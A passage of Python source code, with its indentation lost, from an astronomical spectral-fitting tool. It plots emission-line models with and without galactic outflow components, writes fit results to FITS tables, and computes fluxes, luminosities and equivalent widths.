write_line_test_results(mcpars_line,comp_dict_line,mcpars_no_line,comp_dict_no_line,fit_mask,run_dir,binnum,spaxelx,spaxely)
return
##################################################################################
def get_wavelength_range(lam_gal, noise, velscale, full_profile):#, line_dict):
# Get indices where we perform f-test
eval_ind = range(len(lam_gal))
# number of channels in the test region
nchannel = len(eval_ind)
# if the number of channels < 6 (number of degrees of freedom for double-Gaussian model), then the calculated f-statistic
# will be zero. To resolve this, we extend the range by one pixel on each side, i.e. nchannel = 8.
if nchannel <= 6:
add_chan = 7 - nchannel# number of channels to add to each side; minimum is 7 channels since deg. of freedom = 6
lower_pad = np.arange(eval_ind[0]-add_chan,eval_ind[0],1)#np.arange(eval_ind[0]-add_chan,eval_ind[0],1)
upper_pad = np.arange(eval_ind[-1]+1,eval_ind[-1]+1+add_chan,1)
eval_ind = np.concatenate([lower_pad, eval_ind, upper_pad],axis=0)
nchannel = len(eval_ind)
min_wave, max_wave = lam_gal[eval_ind[0]], lam_gal[eval_ind[-1]]
return min_wave, max_wave, eval_ind, nchannel
##################################################################################
def write_test_stats(stats_dict,run_dir):
"""
Writes statistics for outflow and line testing to a FITS table.
"""
#
#
# Write Outflow model FITS tables
# Extract elements from dictionaries
par_names = []
par_best = []
sig_low = []
sig_upp = []
for key in stats_dict:
par_names.append(key)
par_best.append(stats_dict[key]['best'])
sig_low.append(stats_dict[key]['sigma_low'])
sig_upp.append(stats_dict[key]['sigma_upp'])
if 0:
for i in range(0,len(par_names),1):
print(par_names[i],par_best[i],sig[i])
# Write best-fit parameters to FITS table
col1 = fits.Column(name='parameter', format='30A', array=par_names)
col2 = fits.Column(name='best_fit' , format='E' , array=par_best)
col3 = fits.Column(name='sigma_low' , format='E' , array=sig_low)
col4 = fits.Column(name='sigma_upp' , format='E' , array=sig_upp)
cols = fits.ColDefs([col1,col2,col3,col4])
hdu = fits.BinTableHDU.from_columns(cols)
hdu.writeto(run_dir.joinpath('log', 'test_stats.fits'),overwrite=True)
#
return
##################################################################################
def line_test_plot(lam_gal,comp_dict_outflow,comp_dict_no_outflow,line_list_outflows,line_list_no_outflows,
params_outflows,params_no_outflows,param_names_outflows,param_names_no_outflows,min_wave,max_wave,run_dir):
"""
The plotting function for test_line(). It plots both the outflow
and no_outflow results.
"""
def poly_label(kind):
if kind=="ppoly":
order = len([p for p in param_names_outflows if p.startswith("PPOLY_") ])-1
if kind=="apoly":
order = len([p for p in param_names_outflows if p.startswith("APOLY_")])-1
if kind=="mpoly":
order = len([p for p in param_names_outflows if p.startswith("MPOLY_")])-1
#
ordinal = lambda n: "%d%s" % (n,"tsnrhtdd"[(n//10%10!=1)*(n%10<4)*n%10::4])
return ordinal(order)
def calc_new_center(center,voff):
"""
Calculated new center shifted
by some velocity offset.
"""
c = 299792.458 # speed of light (km/s)
new_center = (voff*center)/c + center
return new_center
# Creat plot window and axes
fig = plt.figure(figsize=(14,11))
gs = gridspec.GridSpec(9,1)
ax1 = fig.add_subplot(gs[0:3,0]) # No outflow
ax2 = fig.add_subplot(gs[3:4,0]) # No outflow residuals
ax3 = fig.add_subplot(gs[5:8,0]) # Outflow
ax4 = fig.add_subplot(gs[8:9,0]) # Outflow residuals
gs.update(wspace=0.0, hspace=0.0) # set the spacing between axes.
# No outflow model (ax1,ax2)
# Put params in dictionary
p = dict(zip(param_names_outflows,params_outflows))
for key in comp_dict_outflow:
if (key=='DATA'):
ax1.plot(comp_dict_outflow['WAVE'],comp_dict_outflow['DATA'],linewidth=0.5,color='white',label='Data',zorder=0)
elif (key=='MODEL'):
ax1.plot(lam_gal,comp_dict_outflow[key], color='xkcd:bright red', linewidth=1.0, label='Model', zorder=15)
elif (key=='HOST_GALAXY'):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['HOST_GALAXY'], color='xkcd:bright green', linewidth=0.5, linestyle='-', label='Host/Stellar')
elif (key=='POWER'):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['POWER'], color='xkcd:red' , linewidth=0.5, linestyle='--', label='AGN Cont.')
elif (key=='PPOLY'):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['PPOLY'], color='xkcd:magenta' , linewidth=0.5, linestyle='-', label='%s-order Poly.' % (poly_label("ppoly")))
elif (key=='APOLY'):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['APOLY'], color='xkcd:bright purple' , linewidth=0.5, linestyle='-', label='%s-order Add. Poly.' % (poly_label("apoly")))
elif (key=='MPOLY'):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['MPOLY'], color='xkcd:lavender' , linewidth=0.5, linestyle='-', label='%s-order Mult. Poly.' % (poly_label("mpoly")))
elif (key in ['NA_OPT_FEII_TEMPLATE','BR_OPT_FEII_TEMPLATE']):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['NA_OPT_FEII_TEMPLATE'], color='xkcd:yellow', linewidth=0.5, linestyle='-' , label='Narrow FeII')
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['BR_OPT_FEII_TEMPLATE'], color='xkcd:orange', linewidth=0.5, linestyle='-' , label='Broad FeII')
elif (key in ['F_OPT_FEII_TEMPLATE','S_OPT_FEII_TEMPLATE','G_OPT_FEII_TEMPLATE','Z_OPT_FEII_TEMPLATE']):
if key=='F_OPT_FEII_TEMPLATE':
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['F_OPT_FEII_TEMPLATE'], color='xkcd:yellow', linewidth=0.5, linestyle='-' , label='F-transition FeII')
elif key=='S_OPT_FEII_TEMPLATE':
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['S_OPT_FEII_TEMPLATE'], color='xkcd:mustard', linewidth=0.5, linestyle='-' , label='S-transition FeII')
elif key=='G_OPT_FEII_TEMPLATE':
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['G_OPT_FEII_TEMPLATE'], color='xkcd:orange', linewidth=0.5, linestyle='-' , label='G-transition FeII')
elif key=='Z_OPT_FEII_TEMPLATE':
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['Z_OPT_FEII_TEMPLATE'], color='xkcd:rust', linewidth=0.5, linestyle='-' , label='Z-transition FeII')
elif (key=='UV_IRON_TEMPLATE'):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['UV_IRON_TEMPLATE'], color='xkcd:bright purple', linewidth=0.5, linestyle='-' , label='UV Iron' )
elif (key=='BALMER_CONT'):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow['BALMER_CONT'], color='xkcd:bright green', linewidth=0.5, linestyle='--' , label='Balmer Continuum' )
# Plot emission lines by cross-referencing comp_dict with line_list
if (key in line_list_outflows):
if (line_list_outflows[key]["line_type"]=="na"):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow[key], color='xkcd:cerulean', linewidth=0.5, linestyle='-', label='Narrow/Core Comp.')
if (line_list_outflows[key]["line_type"]=="br"):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow[key], color='xkcd:bright teal', linewidth=0.5, linestyle='-', label='Broad Comp.')
if (line_list_outflows[key]["line_type"]=="out"):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow[key], color='xkcd:bright pink', linewidth=0.5, linestyle='-', label='Outflow Comp.')
if (line_list_outflows[key]["line_type"]=="abs"):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow[key], color='xkcd:pastel red', linewidth=0.5, linestyle='-', label='Absorption Comp.')
if (line_list_outflows[key]["line_type"]=="user"):
ax1.plot(comp_dict_outflow['WAVE'], comp_dict_outflow[key], color='xkcd:electric lime', linewidth=0.5, linestyle='-', label='Other')
ax1.axvline(min_wave,color="xkcd:yellow",linewidth=1,linestyle="--")
ax1.axvline(max_wave,color="xkcd:yellow",linewidth=1,linestyle="--")
ax2.axvline(min_wave,color="xkcd:yellow",linewidth=1,linestyle="--")
ax2.axvline(max_wave,color="xkcd:yellow",linewidth=1,linestyle="--")
ax1.set_xticklabels([])
ax1.set_xlim(np.min(lam_gal)-10,np.max(lam_gal)+10)
# ax1.set_ylim(-0.5*np.median(comp_dict['MODEL']),np.max([comp_dict['DATA'],comp_dict['MODEL']]))
ax1.set_ylabel(r'$f_\lambda$ ($10^{-17}$ erg cm$^{-2}$ s$^{-1}$ $\mathrm{\AA}^{-1}$)',fontsize=10)
# Residuals
sigma_resid = np.nanstd(comp_dict_outflow['DATA']-comp_dict_outflow['MODEL'])
sigma_noise = np.median(comp_dict_outflow['NOISE'])
ax2.plot(lam_gal,(comp_dict_outflow['NOISE']*3.0),linewidth=0.5,color="xkcd:bright orange",label='$\sigma_{\mathrm{noise}}=%0.4f$' % (sigma_noise))
ax2.plot(lam_gal,(comp_dict_outflow['RESID']*3.0),linewidth=0.5,color="white",label='$\sigma_{\mathrm{resid}}=%0.4f$' % (sigma_resid))
ax2.axhline(0.0,linewidth=1.0,color='white',linestyle='--')
# Axes limits
ax_low = np.min([ax1.get_ylim()[0],ax2.get_ylim()[0]])
ax_upp = np.max([ax1.get_ylim()[1], ax2.get_ylim()[1]])
if np.isfinite(sigma_resid):
ax_upp += 3.0 * sigma_resid
minimum = [np.nanmin(comp_dict_outflow[comp][np.where(np.isfinite(comp_dict_outflow[comp]))[0]]) for comp in comp_dict_outflow
if comp_dict_outflow[comp][np.isfinite(comp_dict_outflow[comp])[0]].size > 0]
if len(minimum) > 0:
minimum = np.nanmin(minimum)
else:
minimum = 0.0
ax1.set_ylim(np.nanmin([0.0, minimum]), ax_upp)
ax1.set_xlim(np.min(lam_gal),np.max(lam_gal))
ax2.set_ylim(ax_low,ax_upp)
ax2.set_xlim(np.min(lam_gal),np.max(lam_gal))
# Axes labels
ax2.set_yticklabels(np.round(np.array(ax2.get_yticks()/3.0)))
ax2.set_ylabel(r'$\Delta f_\lambda$',fontsize=12)
ax2.set_xlabel(r'Wavelength, $\lambda\;(\mathrm{\AA})$',fontsize=12)
handles, labels = ax1.get_legend_handles_labels()
by_label = dict(zip(labels, handles))
ax1.legend(by_label.values(), by_label.keys(),loc='upper right',fontsize=8)
ax2.legend(loc='upper right',fontsize=8)
# Emission line annotations
# Gather up emission line center wavelengths and labels (if available, removing any duplicates)
line_labels = []
for line in line_list_outflows:
if "label" in line_list_outflows[line]:
line_labels.append([line,line_list_outflows[line]["label"]])
line_labels = set(map(tuple, line_labels))
for label in line_labels:
center = line_list_outflows[label[0]]["center"]
if (line_list_outflows[label[0]]["voff"]=="free"):
voff = p[label[0]+"_VOFF"]
elif (line_list_outflows[label[0]]["voff"]!="free"):
voff = ne.evaluate(line_list_outflows[label[0]]["voff"],local_dict = p).item()
xloc = calc_new_center(center,voff)
yloc = np.max([comp_dict_outflow["DATA"][find_nearest(lam_gal,xloc)[1]],comp_dict_outflow["MODEL"][find_nearest(lam_gal,xloc)[1]]])
ax1.annotate(label[1], xy=(xloc, yloc), xycoords='data',
xytext=(xloc, yloc), textcoords='data',
horizontalalignment='center', verticalalignment='bottom',
color='xkcd:white',fontsize=6,
)
# Outlfow models (ax3,ax4)
# Put params in dictionary
p = dict(zip(param_names_no_outflows,params_no_outflows))
for key in comp_dict_no_outflow:
if (key=='DATA'):
ax3.plot(comp_dict_no_outflow['WAVE'],comp_dict_no_outflow['DATA'],linewidth=0.5,color='white',label='Data',zorder=0)
elif (key=='MODEL'):
ax3.plot(lam_gal,comp_dict_no_outflow[key], color='xkcd:bright red', linewidth=1.0, label='Model', zorder=15)
elif (key=='HOST_GALAXY'):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['HOST_GALAXY'], color='xkcd:bright green', linewidth=0.5, linestyle='-', label='Host/Stellar')
elif (key=='POWER'):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['POWER'], color='xkcd:red' , linewidth=0.5, linestyle='--', label='AGN Cont.')
elif (key=='PPOLY'):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['PPOLY'], color='xkcd:magenta' , linewidth=0.5, linestyle='-', label='%s-order Poly.' % (poly_label("ppoly")))
elif (key=='APOLY'):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['APOLY'], color='xkcd:bright purple' , linewidth=0.5, linestyle='-', label='%s-order Add. Poly.' % (poly_label("apoly")))
elif (key=='MPOLY'):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['MPOLY'], color='xkcd:lavender' , linewidth=0.5, linestyle='-', label='%s-order Mult. Poly.' % (poly_label("mpoly")))
elif (key in ['NA_OPT_FEII_TEMPLATE','BR_OPT_FEII_TEMPLATE']):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['NA_OPT_FEII_TEMPLATE'], color='xkcd:yellow', linewidth=0.5, linestyle='-' , label='Narrow FeII')
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['BR_OPT_FEII_TEMPLATE'], color='xkcd:orange', linewidth=0.5, linestyle='-' , label='Broad FeII')
elif (key in ['F_OPT_FEII_TEMPLATE','S_OPT_FEII_TEMPLATE','G_OPT_FEII_TEMPLATE','Z_OPT_FEII_TEMPLATE']):
if key=='F_OPT_FEII_TEMPLATE':
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['F_OPT_FEII_TEMPLATE'], color='xkcd:yellow', linewidth=0.5, linestyle='-' , label='F-transition FeII')
elif key=='S_OPT_FEII_TEMPLATE':
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['S_OPT_FEII_TEMPLATE'], color='xkcd:mustard', linewidth=0.5, linestyle='-' , label='S-transition FeII')
elif key=='G_OPT_FEII_TEMPLATE':
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['G_OPT_FEII_TEMPLATE'], color='xkcd:orange', linewidth=0.5, linestyle='-' , label='G-transition FeII')
elif key=='Z_OPT_FEII_TEMPLATE':
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['Z_OPT_FEII_TEMPLATE'], color='xkcd:rust', linewidth=0.5, linestyle='-' , label='Z-transition FeII')
elif (key=='UV_IRON_TEMPLATE'):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['UV_IRON_TEMPLATE'], color='xkcd:bright purple', linewidth=0.5, linestyle='-' , label='UV Iron' )
elif (key=='BALMER_CONT'):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow['BALMER_CONT'], color='xkcd:bright green', linewidth=0.5, linestyle='--' , label='Balmer Continuum' )
# Plot emission lines by cross-referencing comp_dict with line_list
if (key in line_list_no_outflows):
if (line_list_no_outflows[key]["line_type"]=="na"):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow[key], color='xkcd:cerulean', linewidth=0.5, linestyle='-', label='Narrow/Core Comp.')
if (line_list_no_outflows[key]["line_type"]=="br"):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow[key], color='xkcd:bright teal', linewidth=0.5, linestyle='-', label='Broad Comp.')
if (line_list_no_outflows[key]["line_type"]=="out"):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow[key], color='xkcd:bright pink', linewidth=0.5, linestyle='-', label='Outflow Comp.')
if (line_list_no_outflows[key]["line_type"]=="abs"):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow[key], color='xkcd:pastel red', linewidth=0.5, linestyle='-', label='Absorption Comp.')
if (line_list_no_outflows[key]["line_type"]=="user"):
ax3.plot(comp_dict_no_outflow['WAVE'], comp_dict_no_outflow[key], color='xkcd:electric lime', linewidth=0.5, linestyle='-', label='Other')
ax3.axvline(min_wave,color="xkcd:yellow",linewidth=1,linestyle="--")
ax3.axvline(max_wave,color="xkcd:yellow",linewidth=1,linestyle="--")
ax4.axvline(min_wave,color="xkcd:yellow",linewidth=1,linestyle="--")
ax4.axvline(max_wave,color="xkcd:yellow",linewidth=1,linestyle="--")
ax3.set_xticklabels([])
ax3.set_xlim(np.min(lam_gal)-10,np.max(lam_gal)+10)
# ax3.set_ylim(-0.5*np.median(comp_dict['MODEL']),np.max([comp_dict['DATA'],comp_dict['MODEL']]))
ax3.set_ylabel(r'$f_\lambda$ ($10^{-17}$ erg cm$^{-2}$ s$^{-1}$ $\mathrm{\AA}^{-1}$)',fontsize=10)
# Residuals
sigma_resid = np.nanstd(comp_dict_no_outflow['DATA']-comp_dict_no_outflow['MODEL'])
sigma_noise = np.median(comp_dict_no_outflow['NOISE'])
ax4.plot(lam_gal,(comp_dict_no_outflow['NOISE']*3.0),linewidth=0.5,color="xkcd:bright orange",label='$\sigma_{\mathrm{noise}}=%0.4f$' % (sigma_noise))
ax4.plot(lam_gal,(comp_dict_no_outflow['RESID']*3.0),linewidth=0.5,color="white",label='$\sigma_{\mathrm{resid}}=%0.4f$' % (sigma_resid))
ax4.axhline(0.0,linewidth=1.0,color='white',linestyle='--')
# Axes limits
ax_low = np.min([ax3.get_ylim()[0],ax4.get_ylim()[0]])
ax_upp = np.max([ax3.get_ylim()[1], ax4.get_ylim()[1]])
if np.isfinite(sigma_resid):
ax_upp += 3.0 * sigma_resid
minimum = [np.nanmin(comp_dict_no_outflow[comp][np.where(np.isfinite(comp_dict_no_outflow[comp]))[0]]) for comp in comp_dict_no_outflow
if comp_dict_no_outflow[comp][np.isfinite(comp_dict_no_outflow[comp])[0]].size > 0]
if len(minimum) > 0:
minimum = np.nanmin(minimum)
else:
minimum = 0.0
ax3.set_ylim(np.nanmin([0.0, minimum]), ax_upp)
ax3.set_xlim(np.min(lam_gal),np.max(lam_gal))
ax4.set_ylim(ax_low,ax_upp)
ax4.set_xlim(np.min(lam_gal),np.max(lam_gal))
# Axes labels
ax4.set_yticklabels(np.array(ax4.get_yticks()/3.0,dtype=int))
ax4.set_ylabel(r'$\Delta f_\lambda$',fontsize=12)
ax4.set_xlabel(r'Wavelength, $\lambda\;(\mathrm{\AA})$',fontsize=12)
handles, labels = ax3.get_legend_handles_labels()
by_label = dict(zip(labels, handles))
ax3.legend(by_label.values(), by_label.keys(),loc='upper right',fontsize=8)
ax4.legend(loc='upper right',fontsize=8)
# Emission line annotations
# Gather up emission line center wavelengths and labels (if available, removing any duplicates)
line_labels = []
for line in line_list_no_outflows:
if "label" in line_list_no_outflows[line]:
line_labels.append([line,line_list_no_outflows[line]["label"]])
line_labels = set(map(tuple, line_labels))
for label in line_labels:
center = line_list_no_outflows[label[0]]["center"]
if (line_list_no_outflows[label[0]]["voff"]=="free"):
voff = p[label[0]+"_VOFF"]
elif (line_list_no_outflows[label[0]]["voff"]!="free"):
voff = ne.evaluate(line_list_no_outflows[label[0]]["voff"],local_dict = p).item()
xloc = calc_new_center(center,voff)
yloc = np.max([comp_dict_no_outflow["DATA"][find_nearest(lam_gal,xloc)[1]],comp_dict_no_outflow["MODEL"][find_nearest(lam_gal,xloc)[1]]])
ax3.annotate(label[1], xy=(xloc, yloc), xycoords='data',
xytext=(xloc, yloc), textcoords='data',
horizontalalignment='center', verticalalignment='bottom',
color='xkcd:white',fontsize=6,
)
# Title
ax1.set_title(run_dir.parent.name,fontsize=12)
#
fig.tight_layout()
plt.savefig(run_dir.joinpath('line_test.pdf'),fmt='pdf')
plt.close()
#
return
#### Write Outflow Test Results ##################################################
def write_line_test_results(result_dict_outflows,
comp_dict_outflows,
result_dict_no_outflows,
comp_dict_no_outflows,
fit_mask,
run_dir,
binnum=None,
spaxelx=None,
spaxely=None):
"""
Writes results of outflow testing. Creates FITS tables for
the best-fit parameters and best-fit components for each the outflow
and no-outflow test results.
"""
#
#
# Write Outflow model FITS tables
# Extract elements from dictionaries
par_names = []
par_best = []
sig = []
for key in result_dict_outflows:
par_names.append(key)
par_best.append(result_dict_outflows[key]['med'])
sig.append(result_dict_outflows[key]['std'])
if 0:
for i in range(0,len(par_names),1):
print(par_names[i],par_best[i],sig[i])
# Write best-fit parameters to FITS table
col1 = fits.Column(name='parameter', format='30A', array=par_names)
col2 = fits.Column(name='best_fit' , format='E' , array=par_best)
col3 = fits.Column(name='sigma' , format='E' , array=sig)
cols = fits.ColDefs([col1,col2,col3])
hdu = fits.BinTableHDU.from_columns(cols)
hdr = fits.PrimaryHDU()
hdul = fits.HDUList([hdr, hdu])
if binnum is not None:
hdr.header.append(('BINNUM', binnum, 'bin index of the spaxel (Voronoi)'), end=True)
if spaxelx is not None and spaxely is not None:
hdu2 = fits.BinTableHDU.from_columns(fits.ColDefs([
fits.Column(name='spaxelx', array=spaxelx, format='E'),
fits.Column(name='spaxely', array=spaxely, format='E')
]))
hdul.append(hdu2)
hdul.writeto(run_dir.joinpath('log/line_par_table.fits'),overwrite=True)
# Write best-fit components to FITS file
cols = []
# Construct a column for each parameter and chain
for key in comp_dict_outflows:
cols.append(fits.Column(name=key, format='E', array=comp_dict_outflows[key]))
# Add fit mask to cols
cols.append(fits.Column(name="MASK", format='E', array=fit_mask))
# Write to fits
cols = fits.ColDefs(cols)
hdu = fits.BinTableHDU.from_columns(cols)
hdr = fits.PrimaryHDU()
hdul = fits.HDUList([hdr, hdu])
if binnum is not None:
hdr.header.append(('BINNUM', binnum, 'bin index of the spaxel (Voronoi)'), end=True)
if spaxelx is not None and spaxely is not None:
hdu2 = fits.BinTableHDU.from_columns(fits.ColDefs([
fits.Column(name='spaxelx', array=spaxelx, format='E'),
fits.Column(name='spaxely', array=spaxely, format='E')
]))
hdul.append(hdu2)
hdul.writeto(run_dir.joinpath('log/line_best_model_components.fits'),overwrite=True)
#
#
# Write No-outflow model FITS tables
par_names = []
par_best = []
sig = []
for key in result_dict_no_outflows:
par_names.append(key)
par_best.append(result_dict_no_outflows[key]['med'])
sig.append(result_dict_no_outflows[key]['std'])
if 0:
for i in range(0,len(par_names),1):
print(par_names[i],par_best[i],sig[i])
# Write best-fit parameters to FITS table
col1 = fits.Column(name='parameter', format='30A', array=par_names)
col2 = fits.Column(name='best_fit' , format='E' , array=par_best)
col3 = fits.Column(name='sigma' , format='E' , array=sig)
cols = fits.ColDefs([col1,col2,col3])
hdu = fits.BinTableHDU.from_columns(cols)
hdr = fits.PrimaryHDU()
hdul = fits.HDUList([hdr, hdu])
if binnum is not None:
hdr.header.append(('BINNUM', binnum, 'bin index of the spaxel (Voronoi)'), end=True)
if spaxelx is not None and spaxely is not None:
hdu2 = fits.BinTableHDU.from_columns(fits.ColDefs([
fits.Column(name='spaxelx', array=spaxelx, format='E'),
fits.Column(name='spaxely', array=spaxely, format='E')
]))
hdul.append(hdu2)
hdul.writeto(run_dir.joinpath('log/no_line_par_table.fits'),overwrite=True)
# Write best-fit components to FITS file
cols = []
# Construct a column for each parameter and chain
for key in comp_dict_no_outflows:
cols.append(fits.Column(name=key, format='E', array=comp_dict_no_outflows[key]))
# Add fit mask to cols
cols.append(fits.Column(name="MASK", format='E', array=fit_mask))
# Write to fits
cols = fits.ColDefs(cols)
hdu = fits.BinTableHDU.from_columns(cols)
hdu.writeto(run_dir.joinpath('log', 'no_line_best_model_components.fits'),overwrite=True)
#
return
####################################################################################
def calc_max_like_flux(comp_dict, lam_gal):
"""
Calculates component fluxes for maximum likelihood fitting.
Adds fluxes to exiting parameter dictionary "pdict" in max_likelihood().
"""
flux_dict = {}
for key in comp_dict:
if key not in ['DATA', 'WAVE', 'MODEL', 'NOISE', 'RESID', "HOST_GALAXY", "POWER", "BALMER_CONT", "PPOLY", "APOLY", "MPOLY"]:
flux = np.log10(1.e-17*(simps(comp_dict[key],lam_gal)))
# Add to flux_dict
flux_dict[key+"_FLUX"] = flux
return flux_dict
####################################################################################
def calc_max_like_lum(flux_dict, z, H0=70.0,Om0=0.30):
"""
Calculates component luminosities for maximum likelihood fitting.
Adds luminosities to exiting parameter dictionary "pdict" in max_likelihood().
"""
# Compute luminosity distance (in cm) using FlatLambdaCDM cosmology
cosmo = FlatLambdaCDM(H0, Om0)
d_mpc = cosmo.luminosity_distance(z).value
d_cm = d_mpc * 3.086E+24 # 1 Mpc = 3.086e+24 cm
lum_dict = {}
for key in flux_dict:
flux = 10**flux_dict[key] #* 1.0E-17
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 )) #/ 1.0E+42
# Add to lum_dict
lum_dict[key[:-4]+'LUM']= lum
return lum_dict
####################################################################################
def calc_max_like_eqwidth(comp_dict, line_list, lam_gal, noise, velscale):
"""
Calculates component fluxes for maximum likelihood fitting.
Adds fluxes to exiting parameter dictionary "pdict" in max_likelihood().
"""
# Create a single continuum component based on what was fit
cont = np.zeros(len(lam_gal))
for key in comp_dict:
if key in ["POWER","HOST_GALAXY","BALMER_CONT", "PPOLY", "APOLY", "MPOLY"]:
cont+=comp_dict[key]
# Get all spectral components, not including data, model, resid, and noise
spec_comps= [i for i in comp_dict if i not in ["DATA","MODEL","WAVE","RESID","NOISE","POWER","HOST_GALAXY","BALMER_CONT", "PPOLY", "APOLY", "MPOLY"]]
# Get keys of any lines that were fit for which we will compute eq. widths for
lines = [i for i in line_list]
if (spec_comps) and (lines) and (np.sum(cont)>0):
eqwidth_dict = {}
for c in spec_comps:
if 1:#c in lines: # component is a line
# print(c,comp_dict[c],cont)
eqwidth = simps(comp_dict[c]/cont,lam_gal)
#
if ~np.isfinite(eqwidth):
eqwidth=0.0
# Add to eqwidth_dict
eqwidth_dict[c+"_EW"] = eqwidth
else:
eqwidth_dict = None
return eqwidth_dict
##################################################################################
def calc_max_like_cont_lum(clum, comp_dict, lam_gal, z, H0=70.0, Om0=0.30):
"""
Calculate monochromatic continuum luminosities
"""
clum_dict = {}
total_cont = np.zeros(len(lam_gal))
agn_cont = np.zeros(len(lam_gal))
host_cont = np.zeros(len(lam_gal))
for key in comp_dict:
if key in ["POWER","HOST_GALAXY","BALMER_CONT", "PPOLY", "APOLY", "MPOLY"]:
total_cont+=comp_dict[key]
if key in ["POWER","BALMER_CONT", "PPOLY", "APOLY", "MPOLY"]:
agn_cont+=comp_dict[key]
if key in ["HOST_GALAXY", "PPOLY", "APOLY", "MPOLY"]:
host_cont+=comp_dict[key]
#
# Calculate luminosity distance
cosmo = FlatLambdaCDM(H0, Om0)
d_mpc = cosmo.luminosity_distance(z).value
d_cm = d_mpc * 3.086E+24 # 1 Mpc = 3.086e+24 cm
# Interpolation function for the continuum
interp_tot = interp1d(lam_gal,total_cont,kind='linear',bounds_error=False,fill_value=(1.e-10,1.e-10))
interp_agn = interp1d(lam_gal,agn_cont ,kind='linear',bounds_error=False,fill_value=(1.e-10,1.e-10))
interp_host = interp1d(lam_gal,host_cont ,kind='linear',bounds_error=False,fill_value=(1.e-10,1.e-10))
for c in clum:
# Total luminosities
if (c=="L_CONT_TOT_1350"):
flux = interp_tot(1350.0) * 1.e-17# * 1350.0
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 1350.0) #/ 1.0E+42
clum_dict["L_CONT_TOT_1350"] = lum
if (c=="L_CONT_TOT_3000"):
flux = interp_tot(3000.0) * 1.e-17 #* 3000.0
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 3000.0) #/ 1.0E+42
clum_dict["L_CONT_TOT_3000"] = lum
if (c=="L_CONT_TOT_5100"):
flux = interp_tot(5100.0) * 1.e-17 #* 5100.0
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 5100.0) #/ 1.0E+42
clum_dict["L_CONT_TOT_5100"] = lum
# AGN luminosities
if (c=="L_CONT_AGN_1350"):
flux = interp_agn(1350.0) * 1.e-17# * 1350.0
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 1350.0) #/ 1.0E+42
clum_dict["L_CONT_AGN_1350"] = lum
if (c=="L_CONT_AGN_3000"):
flux = interp_agn(3000.0) * 1.e-17 #* 3000.0
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 3000.0) #/ 1.0E+42
clum_dict["L_CONT_AGN_3000"] = lum
if (c=="L_CONT_AGN_5100"):
flux = interp_agn(5100.0) * 1.e-17 #* 5100.0
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 5100.0) #/ 1.0E+42
clum_dict["L_CONT_AGN_5100"] = lum
# Host luminosities
if (c=="L_CONT_HOST_1350"):
flux = interp_host(1350.0) * 1.e-17# * 1350.0
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 1350.0) #/ 1.0E+42
clum_dict["L_CONT_HOST_1350"] = lum
if (c=="L_CONT_HOST_3000"):
flux = interp_host(3000.0) * 1.e-17 #* 3000.0
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 3000.0) #/ 1.0E+42
clum_dict["L_CONT_HOST_3000"] = lum
if (c=="L_CONT_HOST_5100"):
flux = interp_host(5100.0) * 1.e-17 #* 5100.0
# Convert fluxes to luminosities and normalize by 10^(+42) to avoid numerical issues
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 5100.0) #/ 1.0E+42
clum_dict["L_CONT_HOST_5100"] = lum
# Host and AGN fractions
if (c=="HOST_FRAC_4000"):
clum_dict["HOST_FRAC_4000"] = interp_host(4000.0)/interp_tot(4000.0)
if (c=="AGN_FRAC_4000"):
